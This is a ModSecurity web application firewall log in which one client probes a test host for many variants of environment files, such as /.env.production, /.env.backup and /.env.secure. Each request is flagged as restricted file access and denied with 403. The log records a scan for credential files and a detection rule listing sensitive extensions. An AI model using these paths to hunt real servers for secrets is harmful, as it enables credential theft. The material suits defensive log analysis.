[Wed Feb 19 06:29:50.245821 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "Z7VsTgzqEFiMFYV11ByxHgAAAAM"]
[Wed Feb 19 06:29:50.274062 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "Z7VsTgzqEFiMFYV11ByxHwAAAAM"]
[Wed Feb 19 06:29:50.274548 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "Z7VsTgzqEFiMFYV11ByxHwAAAAM"]
[Wed Feb 19 06:29:50.275025 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "Z7VsTgzqEFiMFYV11ByxHwAAAAM"]
[Wed Feb 19 06:29:50.317372 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.override"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.override"] [unique_id "Z7VsTgzqEFiMFYV11ByxIAAAAAM"]
[Wed Feb 19 06:29:50.317777 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.override"] [unique_id "Z7VsTgzqEFiMFYV11ByxIAAAAAM"]
[Wed Feb 19 06:29:50.318361 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.override"] [unique_id "Z7VsTgzqEFiMFYV11ByxIAAAAAM"]
[Wed Feb 19 06:29:50.365793 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z7VsTgzqEFiMFYV11ByxIQAAAAM"]
[Wed Feb 19 06:29:50.366355 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z7VsTgzqEFiMFYV11ByxIQAAAAM"]
[Wed Feb 19 06:29:50.366834 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z7VsTgzqEFiMFYV11ByxIQAAAAM"]
[Wed Feb 19 06:29:50.397055 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Z7VsTgzqEFiMFYV11ByxIgAAAAM"]
[Wed Feb 19 06:29:50.397469 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Z7VsTgzqEFiMFYV11ByxIgAAAAM"]
[Wed Feb 19 06:29:50.397937 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Z7VsTgzqEFiMFYV11ByxIgAAAAM"]
[Wed Feb 19 06:29:50.425189 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VsTgzqEFiMFYV11ByxIwAAAAM"]
[Wed Feb 19 06:29:50.425478 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VsTgzqEFiMFYV11ByxIwAAAAM"]
[Wed Feb 19 06:29:50.425831 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VsTgzqEFiMFYV11ByxIwAAAAM"]
[Wed Feb 19 06:29:50.426386 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z7VsTgzqEFiMFYV11ByxIwAAAAM"]
[Wed Feb 19 06:29:50.461755 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example.local"] [unique_id "Z7VsTgzqEFiMFYV11ByxJAAAAAM"]
[Wed Feb 19 06:29:50.462170 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example.local"] [unique_id "Z7VsTgzqEFiMFYV11ByxJAAAAAM"]
[Wed Feb 19 06:29:50.462691 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example.local"] [unique_id "Z7VsTgzqEFiMFYV11ByxJAAAAAM"]
[Wed Feb 19 06:29:50.489370 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.settings"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.settings"] [unique_id "Z7VsTgzqEFiMFYV11ByxJQAAAAM"]
[Wed Feb 19 06:29:50.489761 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.settings"] [unique_id "Z7VsTgzqEFiMFYV11ByxJQAAAAM"]
[Wed Feb 19 06:29:50.490223 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.settings"] [unique_id "Z7VsTgzqEFiMFYV11ByxJQAAAAM"]
[Wed Feb 19 06:29:50.517764 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VsTgzqEFiMFYV11ByxJgAAAAM"]
[Wed Feb 19 06:29:50.518074 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VsTgzqEFiMFYV11ByxJgAAAAM"]
[Wed Feb 19 06:29:50.518484 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VsTgzqEFiMFYV11ByxJgAAAAM"]
[Wed Feb 19 06:29:50.519094 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z7VsTgzqEFiMFYV11ByxJgAAAAM"]
[Wed Feb 19 06:29:50.545751 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.secure"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secure"] [unique_id "Z7VsTgzqEFiMFYV11ByxJwAAAAM"]
[Wed Feb 19 06:29:50.546151 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secure"] [unique_id "Z7VsTgzqEFiMFYV11ByxJwAAAAM"]
[Wed Feb 19 06:29:50.546685 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secure"] [unique_id "Z7VsTgzqEFiMFYV11ByxJwAAAAM"]
[Wed Feb 19 06:29:50.635685 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z7VsTgzqEFiMFYV11ByxKQAAAAM"]
[Wed Feb 19 06:29:50.635999 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z7VsTgzqEFiMFYV11ByxKQAAAAM"]
[Wed Feb 19 06:29:50.636296 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z7VsTgzqEFiMFYV11ByxKQAAAAM"]
[Wed Feb 19 06:29:50.661390 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "Z7VsTgzqEFiMFYV11ByxKgAAAAM"]
[Wed Feb 19 06:29:50.661659 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "Z7VsTgzqEFiMFYV11ByxKgAAAAM"]
[Wed Feb 19 06:29:50.661929 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "Z7VsTgzqEFiMFYV11ByxKgAAAAM"]
[Wed Feb 19 06:29:50.688202 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7VsTgzqEFiMFYV11ByxKwAAAAM"]
[Wed Feb 19 06:29:50.688500 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7VsTgzqEFiMFYV11ByxKwAAAAM"]
[Wed Feb 19 06:29:50.688774 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7VsTgzqEFiMFYV11ByxKwAAAAM"]
